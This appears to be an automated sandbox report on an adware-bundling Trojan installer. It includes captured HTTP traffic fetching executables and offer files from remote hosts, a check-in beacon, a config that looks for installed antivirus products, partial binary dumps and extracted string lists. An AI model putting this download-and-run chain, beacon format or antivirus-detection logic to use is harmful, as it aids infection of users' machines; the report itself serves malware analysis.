.r%[email protected]>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4...
.|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...
@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd
{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B
_a.( ....,T#*.M..2iLI..C.. .FX....c.%:[email protected]}.i.....lb..&......
...uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u.
...m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.
'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6
........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb........
..K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S.
 .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m........
.....w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.
9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps....
..K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..
<<< skipped >>>


GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411022125"
Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT
Cache-Control: max-age=53813
Content-Length: 10048
Content-Type: application/octet-stream
X-HW: 1448341070.dop008.fr7.t,1448341069.cds002.fr7.c
PK.........l$Etbj.....=-......OfferScreen_12.html.:kS#7..C..A.......G.
6P.0.....;x6...5%w.m............#...s..!.#...S...w..../.....v.....S.t.
..vN..w.w._?.?~`.......tR ^..g..... ...b..-vz.L....[.5...c..N.2.%..k.D
.v^({.......?......\8... ~...Qr....u..R$,...%N..>...t.....ryw?a....
..e.......(.x5...8...;9).........Q..6i.$.W........8s........{..j.,..i.
!.[...w.....`....&:[.;6.....Je.Wb..F.....`k..T.....<.....h.....f.j.
..`.W......n..q...,..g\t..kU....irm...,.I....y......BpsG.#.W.f..0..Bfn
6...)oG3.$.;...C.{h.........(..-..A.p..Ay..f.(..`o{ow....D......`.N..L
.y..](q.?-.....|.(J ..h....Iy......<...,U.=b..6 Ww....!.cV.2c...~.}
...f..QI. ......U.F...\E.................Zdn^.....~...I...{d{.4..H...h
.&...j..2..u....*..z...M.t..Rp....'..%b.......W...... <.[......4.88
.......r..wmPr.....0...APy......;.l..=.u....3....R......z..#$R..._...(
Ig".........e..._..*1js......v..([email protected][..0m..a.....V.&......
q.;.....xs`>.j.6..&.U.W...!L.!r.._1~...Z......HH..8....7....!...=e.
.P....g2....p...D...:B..^..$3..'[email protected])tz.by.5....{.m..]
u.I.L({.t....Az...P..|....;1...{.f...g..J.^...p......M.....'....=... .
...Q.'V...#.~.u ....YJ*(^.R...-...~......XP6..W.....gHx.]...`.5.......
7.....#..A...d.~we1.......G... ..g."-....Q....P.n.."wOAb."C.. `g...r`t
....i......q......^.>............. S.. !|..9D.6..r.}....n&-.. Y2{-K
F....[...{......... [email protected]~;...jP.....?...
.....ZQ.;......;x.x.....{  C....vq'.7LfGI..}6c........J.......<...h
5m.C.~..7)@c....8>......;.....L..%.. .).=o8....b&........-..h..
<<< skipped >>>


POST /FCL_htiw_qinu.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 106
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&pubid=11660&CbId=7598&BundleVersionID=IM_240914@01&mid=qGKynuZ0mun81YJHk71SsLj1y8vIIG48
HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.14
Content-Length: 1943
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php.
.hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://www
.stsunsetwest.com/DS_AdvAffiliateId.php..37.57.16.189_2015-11-23_23:57
:47..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..419#O|V^0*S^0*E^0
*EV1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\
amigo.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe
,RE3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\W
indows\CurrentVersion\App Paths\amigo.exe..422#D|2A^0,RE3|webssearches
Software\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftwar
e\awesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\s
weet-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi
-viewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\
mystartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\Cur
rentVersion\Uninstall\avast..430#O|X^0*V^0*S^0*E^0*EV1^0*T^0,D|3.5A^0,
B2|I^7TU*F^29TU,WBCS|WebbionBrowserChecks,RV3|Lavasoft\Web Companion^I
nstalled^1..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malw
arebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiCl
ient,RE2|AVG,RE2|Classes\CLSID\{9563BC59-9556-4805-8CD4-886781779D8D},
RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Unin
stall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malwar
e,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|A
VG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\M
<<< skipped >>>


GET /DigiAqua_7598.exe HTTP/1.1
User-Agent: toys::file
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1448307590"
Last-Modified: Mon, 23 Nov 2015 19:39:50 GMT
Cache-Control: max-age=86399
Content-Length: 232450
Content-Type: application/octet-stream
X-HW: 1448341064.dop014.fr7.t,1448341064.cds029.fr7.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
..................4..............................................t....
....4..?..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]..../.. ...........................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>


GET /download.php?ln6GeA== HTTP/1.1
User-Agent: toys::file
Host: VVV.comar13west.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Tue, 24 Nov 2015 04:57:42 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Content-Disposition: attachment; filename="InstallMonetizer.exe"
Location: hXXp://secured.cdnpmmm.us/DigiAqua_7598.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET /DigiAqua_7598.exe HTTP/1.1
User-Agent: toys::file
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:43 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1448307590"
Last-Modified: Mon, 23 Nov 2015 19:39:50 GMT
Cache-Control: max-age=86400
Content-Length: 232450
Content-Type: application/octet-stream
X-HW: 1448341063.dop011.fr7.t,1448341063.cds029.fr7.p
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
..................4..............................................t....
....4..?..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]..../.. ...........................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.....
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_188:




.text
`.rdata
@.data
.rsrc
SSSh88E
SSSh(8E
SSSSh0u
PSSh RE
__MSVCRT_HEAP_SELECT
user32.dll
COMCTL32.dll
VERSION.dll
GetWindowsDirectoryA
KERNEL32.dll
CreateDialogIndirectParamA
MsgWaitForMultipleObjects
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
LZ32.dll
RPCRT4.dll
GetCPInfo
EnumChildWindows
SetViewportExtEx
SetViewportOrgEx
Folder=%s
File=%s
explorer.exe
ErrorInformation=%s
setup.log
GetSystemWindowsDirectoryA
KERNEL32.DLL
EXE=%s
ISSetup.dll
_Setup2k.dll
_Setup7.dll
setup.isn
_Setup.dll
C:\CodeBases\isdev\src\Runtime\InstallScript\SetupNew\setup.cpp
setup.exe
hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
data1.hdr
=Result=%s
HeaderPathFile=%s
User=%s
Password=%s
ProxyUser=%s
ProxyPassword=%s
Result=%s
-sel_langx
setup.inx
layout.bin
SourceFile=%s
TargetFile=%s
data1.cab
.?AVhttp_file@is@@
d.d %s%s
%s %ld %s
%ld %s
.DEFAULT\Control Panel\International
.Default\Control Panel\desktop\ResourceLocale
Kernel32.dll
kernel32.dll
Ntdll.dll
psapi.dll
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
SOFTWARE\Microsoft\Windows\CurrentVersion
%s|%s|
%s%s%s
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
%d.%d
%d.%d.%d.%d
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
source%d
dest%d
InstallShieldPendingOperation
MPR.DLL
.rdata
.debug
zcÁ
uxtheme.dll
%hx.rra
skin.ini
-x
%d,%d,%d
%d,%d
c:\%original file name%.exe
!"#$%&'()* ,
version="1.0.0.0"
name="InstallShield.Setup"
<description>InstallShield.Setup</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
PAPP:%s
PVENDOR:%s
PGUID:%s
>%s (%d)
123.tmp
hXXp://
%ld : 0x%x
%*.*f
lISSetup.dll
setup.ini
pinstallfromweb:
key%d
cmdline
ErrorReportURL
CompanyURL
PasswordDialog
hXXps://
<Support>\Engine\Log
<Support>
SUPPORTDIR
SHOW_PASSWORD_DIALOG
PTF://
setup.gif
setup.bmp
setupdir\x
%d%s%d%s%d%s%d
Windows XP
Windows Server2003
Windows Vista
Windows 2000
Windows 95
Windows 98
Windows Me
Windows NT 4.0
EXPLORER.EXE
PSTORES.EXE
%s%s%d.%s
Setup.exe
14.0.162

%original file name%.exe_188_rwx_003C0000_00002000:




The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_188_rwx_00A41000_00137000:




t.OOt
SSSSh0u
SSSSh
u#SSSSh
SSSSh$O
WSSh|Z
WSShlZ
SSSh Z
SSShlZ
PSSht
PSShd
PSSh\
PSShT
^}•x
AUTPRX32.DLL
__MSVCRT_HEAP_SELECT
user32.dll
GetWindowsDirectoryA
WinExec
KERNEL32.dll
ExitWindowsEx
CreateDialogIndirectParamA
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegEnumKeyExA
RegDeleteKeyA
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll
GetCPInfo
MsgWaitForMultipleObjects
SetViewportExtEx
SetViewportOrgEx
CStdStubBuffer_IsIIDSupported
ISSetup.dll
C:\CodeBases\isdev\src\Shared\LogServices2\ComVariantEx2.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\FeatureLog.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\LogDB.cpp
sC:\CodeBases\isdev\src\Shared\LogServices2\LogServices.cpp
_hk%d
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypes.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypeClsFactory.h
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypeTuple.cpp
Result=%s
%s=%s
C:\CodeBases\isdev\src\Shared\LogServices2\persist.h
ID_%d
oC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\CABFile.cpp
setup.ini
xj%s\%s
%s %s:%s
AE7D33AA-6C76-4FC5-A151-633472AD6A94
layout.bin
Data1.cab
Data1.hdr
QC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Component.cpp
%d.%d.%d.%d
%d.%d
UnresolvedTarget=%s
ResolvedTarget=%s
Feature=%s
Target=%s
Source=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TargetFile.h
'`.exe
File=%s
OverwriteDetails=%s
wC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\DriverWrapper.cpp
\AppHelp.dll
ISBEW64.exe
Component=%s
RegExe=%s
RegCmdLine=%s
DotNetInstaller.exe
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileGroup.cpp
OSFlavors4SingleOperation=0xlx
GetSystemWindowsDirectoryA
KERNEL32.DLL
%hx.rra
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileRegistrar.cpp
aSResult=%s
oleaut32.dll
RegisterFile%d
SOFTWARE\Microsoft\Windows\CurrentVersion
ZBC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileService.cpp
ShowPasswordDialog
CmdLine
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\IScriptWrapper.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\KernelMedia.cpp
setup.inx
_Setup.dll
data2.cab
data1.cab
data1.hdr
setup.exe
CF3DC1C0-3C9A-11D3-88ED-00C04F72F303
MediaFile=%s
User=%s
Password=%s
ProxyUser=%s
ProxyPassword=%s
SetupLauncherName=%s
TempDisk1Folder=%s
<Support>Script
PUBLICKEY
Name=Name=%s
Name=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectHolder.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectWrapper.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\PropertyBag.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Reboot.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Registry.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\RegistrySet.cpp
RootKey=0xlx
Key=%s
Data=%s
CreateKeyEnd
CreateKeyBegin
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ServiceProvider.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\SetupType.cpp
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\SharedFiles.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Shell.cpp
ISShellObjOp
Folder=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ShellLink.cpp
FType=%s
ProgramFolder=%s
ItemName=%s
CommandLine= %s
WorkingDir=%s
IconFile=%s
ShortcutKey=%s
Hotkey
Type=%s
PendingFileRenameOperations
WININIT.INI
Value=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TextSubstitution.cpp
TextSub=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TransferEventsListener.cpp
agent.exe
Library=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\ErrorObj.cpp
Type=%S
Description=%S
Source=%S
HelpFile=%S
ISRT.dll
(string)%s
(stringw)%S
Function=%s
ReturnType=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptDebug.cpp
InstallShield.SetupScriptDebugger.14
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptEngine.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptImpl.cpp
ExportedFuncEnd
ExportedFuncBegin
Method=%s
hC:\CodeBases\isdev\src\Runtime\InstallScript\iScript\struct.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\User\BillBoads.cpp
DH%s\bbrd%d.bmp
%s\bbrd%d.wmf
C:\CodeBases\isdev\src\Runtime\InstallScript\User\MainWindow.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\User\UserInterface.cpp
%d,%d,%d
%d,%d
d.d %s%s
%s %ld %s
%ld %s
.rdata
.debug
BetaMarker.dat
EvalMarker.dat
InstallShield.SetupKernel.14
InstallShield.SetupKernel
InstallShield.SetupLogServices.14
InstallShield.SetupLogServices
InstallShield.SetupScriptDriverWrapper.14
InstallShield.SetupScriptDriverWrapper
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectWrapper.h
>%s (%d)
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
%s|%s|
.?AVhttp_file@is@@
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
.text
source%d
dest%d
Software\InstallShieldPendingOperation
WinTrust.dll
CertFreeCertificateChain
CertGetCertificateChain
CertAddCertificateContextToStore
CertFindCertificateInStore
CertCloseStore
CertNameToStrA
CertOpenSystemStoreA
CertSaveStore
CertOpenStore
CertGetIssuerCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertFreeCertificateContext
CryptImportPublicKeyInfo
CertCompareCertificate
CryptMsgClose
CryptMsgGetParam
Crypt32.dll
CryptDestroyKey
CryptExportKey
CryptImportKey
CryptDeriveKey
Advapi32.dll
%s%s%s
zcÁ
0*%UP
q.ya!
%u X`i@
_$,ZS.db
o7.6.3
c:\%original file name%.exe
OPERATION
*.hdr
DISK1SETUPEXENAME
corecomp.ini
SUPPORTDIR
p{92D2CF18-2F36-11d3-A901-00105A088FAC}
portuguese-brazil
portuguese
Software\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield Uninstall Information\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
UNINSTALLKEY
UninstallKey
hXXp://
<Support>
hXXps://
PTF://
eSHAREDSUPPORTDIR
123.tmp
r\ilog.dll
installfromweb:
1234567890
dBenderC.Cab
Software\Microsoft\Windows\CurrentVersion
reboot.ini
*.lnk
explorer.exe
HotKeyCode=
xvalue.shl
*.ips
*%.4lx*.ips
%*.*f
IWININIT.INI
_isuser.dll
_isres.dll
<WINDIR>\Microsoft.NET\Framework\v3.0
<WINDIR>\Microsoft.NET\Framework\v2.0.50727
<WINDIR>\Microsoft.NET\Framework\v1.1.4322
<WINDIR>\Microsoft.NET\Framework\v1.0.3705
InstallShield\UpdateService\agent.exe
dispatch_execption
%s%s%d.%s
6.0.100.1228
1-800-809-5659
InstallShield Runtime Installer<An operation was attempted without opening the Log database.

%original file name%.exe_188_rwx_00B98000_00014000:




?* -,-30
>MN92>a.kS.
.%8%8%8%
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0
0.0.0.0.0
3h%UH

%original file name%.exe_188_rwx_00BCF000_00001000:




kernel32.dll
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll

%original file name%.exe_188_rwx_018D1000_00080000:




SSSSh0u
uwSSh
PSShx@
PSShh@
PSSh`B
PSShXB
.tTPV
FTPjK
FtPj;
F.PjRWj
u.hPX
u.WWj
u.VVj
__MSVCRT_HEAP_SELECT
portuguese-brazilian
user32.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
EnumChildWindows
CreateDialogIndirectParamA
USER32.dll
GDI32.dll
EnumPortsA
WINSPOOL.DRV
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
RPCRT4.dll
VERSION.dll
GetCPInfo
MsgWaitForMultipleObjects
SetViewportExtEx
SetViewportOrgEx
RegCloseKey
RegOpenKeyA
RegOpenKeyExA
ADVAPI32.dll
ISRT.dll
Result=%s
RegistrySet=%s
Media=%s
)Result=%s
Name=%s
%s\%s
GetSystemWindowsDirectoryA
KERNEL32.DLL
%hx.rra
Dll=%s
Function=%s
Param01=%s
Dir=%s
Source=%s
Target=%s
InstallFromTheWeb
Library=%s
RICHED32.DLL
uxtheme.dll
File=%s
ProgId=%s
AssemblyPathFile=%s
AssemblyNameAndClass=%s
AppDomain=%s
mscoree.dll
PrintFileWithShellExecute
ShellExecute failed.
An unhandled exception occurred in 'CPrintRuntime::%s'.
ShellExecute returned:
RootKey=%ld
Key=%s
Class=%s
RegDBCreateKeyEx
RegDBDeleteKey
Value=%s
ValueName=%s
RegDBSetKeyValueEx
%d,%d,%d
%d,%d
ProgramFolder=%s
ItemName=%s
CommandLine= %s
WorkingDir=%s
IconFile=%s
ShortcutKey=%s
Folder=%s
Icon=%s
NewItemName=%s
CommandLine=%s
IconPath=%s
view.bmp
FileName=%s
FileVersion=%s
%d.%d.%d.%d
4194303.9
4194303
%s%s%s
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
SOFTWARE\Microsoft\Windows\CurrentVersion
%s|%s|
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
.?AVhttp_file@is@@
MPR.DLL
Kernel32.dll
kernel32.dll
Ntdll.dll
psapi.dll
skin.ini
-x
zcÁ
c:\%original file name%.exe
a.hdr
hXXp://
123.tmp
hXXps://
PTF://
difxapi.dll
1234567890
_isuser.dll
_isres.dll
<Support>
_ISRes.dll
_ISUser.dll
%s%s%d.%s
@%*.*f
EXPLORER.EXE
PSTORES.EXE
>MN92>a.kS.
42%,,2%>

setup.exe_880:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\nsCBHTML5.dll
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\nsCBHTML5.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp
tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,DBNI|OtherthanIEDefault,RE2|Opera Software,RE3|Opera Software
VAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira
Nullsoft Install System v11-Jul-2014.cvs
GetProcessHeap
OLEAUT32.dll
WININET.dll
MSVCRT.dll
nsWeb.dll
6(7.767;7
4<.Pd
q.ya!
%u X`i@
_$,ZS.db
o7.6.3
0*%UP
nsy2.tmp
2.html?
://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
2~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1905696
ments and Settings\"%CurrentUserName%"\Local Settings\Temp\setup.exe"
{E1070104-F404-44CE-B556-0622F9D63EE5}
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
ft Windows XP
"%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe"
%Documents and Settings%\%current user%\Local Settings\Temp
setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe
1048838
940180580
1179874
1376514
1048880
1245524
1179950
37.57.16.189_2015-11-23_23:57:47
